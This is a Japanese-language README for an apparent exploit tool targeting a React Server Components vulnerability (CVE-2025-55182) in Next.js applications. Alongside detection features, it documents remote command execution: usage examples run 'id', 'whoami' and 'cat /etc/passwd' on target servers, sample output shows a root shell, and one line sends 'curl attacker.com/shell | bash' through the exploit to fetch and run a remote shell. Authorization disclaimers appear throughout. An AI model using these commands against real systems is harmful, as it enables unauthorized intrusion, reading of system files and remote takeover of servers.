
Next.jsアプリケーションにおける **React Server Components (RSC)** の脆弱性を検出および悪用するためのPythonベースのセキュリティスキャナです。このツールは、受動的検出、能动的フィンガープリンティング、およびRCE悪用テストを実行します。
Next.jsアプリケーションにおける**React Server Components (RSC)**の脆弱性を検出・悪用するPythonベースのセキュリティスキャナーです。このツールは、受動的検出、能動的フィンガープリンティング、およびRCE悪用テストを実行します。
⚠️ 警告: このツールは許可されたセキュリティテストのみを対象としています。コンピュータシステムへの不正アクセスは違法です。テスト前に必ず書面による許可を取得してください。
✅ 受動的検出 - HTML、ヘッダー、ページ構造を分析してRSC指標を検出
✅ 能動的フィンガープリンティング - RSC固有のヘッダーを送信してサーバー応答を検出
✅ HTTPヘッダー分析 - Next.jsおよびRSC関連ヘッダーを識別
✅ RCE悪用 - 脆弱なサーバー上でコマンドを実行(悪用可能な場合)
✅ カラー化された端末出力 - 視認性向上のための拡張視覚フィードバック
✅ 対話モード - 悪用モードで複数のコマンドを実行
✅ 堅牢なデコード - gzip圧縮およびバイナリペイロードを処理
リポジトリをクローン
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
依存関係をインストール
pip install -r requirements.txt
必要なパッケージ:
requests>=2.28.0 - HTTPクライアントライブラリurllib3>=1.26.0 - 高度なHTTPユーティリティcolorama>=0.4.6 - 端末色(Windows対応)beautifulsoup4 - HTMLパースpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
プロンプトでコマンドを入力(終了するにはquitと入力)。
| Option | 説明 |
|---|---|
<URL> | ターゲットURL(必須)。ない場合は自動でhttps://を付加 |
--exploit | 検出後にRCE悪用を有効にする |
--cmd <command> | 特定のコマンドを実行(--exploitと併用) |
RSC脆弱性を検出:
python rsc_detector.py https://target.com
悪用してidコマンドを実行:
python rsc_detector.py https://target.com --exploit --cmd "id"
悪用してcat /etc/passwdを実行:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
対話モード(複数コマンド):
python rsc_detector.py https://target.com --exploit
window.__next_fマーカー(Next.js App Router)をチェックtext/x-component Content-Typeを検出__NEXT_DATA__とNext.jsインポートを分析Server、Vary、X-Nextjs-Cacheヘッダーを調べるRSC: 1ヘッダーを持つリクエストを送信[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
CVE-2025-55182 は以下を悪用します:
child_process.execSync() を介したコマンドインジェクションこのツールは許可されたセキュリティテストのみを厳格に対象としています:
不正なコンピュータアクセスは違法です:以下の法律に基づきます
このツールを使用して脆弱性を発見した場合:
このツールはデフォルトでSSL検証を無視します。検証を有効にするには:
detector = RSCDetector(url, verify_ssl=True)
このツールは自動的に:
コード内のタイムアウトを増やす:
response = self.session.get(self.url, timeout=30) # 30 seconds
CVE-2025-55182/
├── README.md # このファイル
├── requirements.txt # Python依存関係
├── rsc_detector.py # メインスキャナー&悪用エンジン
├── rsc_cli.py # CLIユーティリティ(存在する場合)
├── script.py # 追加スクリプト(存在する場合)
├── COLOR_GUIDE.md # カラー出力ドキュメント
└── .gitignore # Git無視ルール
requests>=2.28.0 # HTTPリクエスト
urllib3>=1.26.0 # 高度なHTTP
beautifulsoup4>=4.11.0 # HTMLパース
colorama>=0.4.6 # 端末色(Windows)
一括インストール:
pip install -r requirements.txt
--exploitフラグを省略python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
python rsc_detector.py https://target.com > scan_results.txt 2>&1
for url in https://site1.com https://site2.com; do
python rsc_detector.py "$url"
done
バグを発見した、または機能強化がありますか?貢献を歓迎します!
git checkout -b feature/improvement)git commit -am 'Add feature')git push origin feature/improvement)THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
このプロジェクトは教育および許可されたセキュリティテスト目的のみで提供されます。
セキュリティ研究および許可されたペネトレーションテストのために作成されました。
最終更新: 2025年12月19日
覚えておいてください: 大きな力には大きな責任が伴います。このツールを倫理的かつ合法的に使用してください。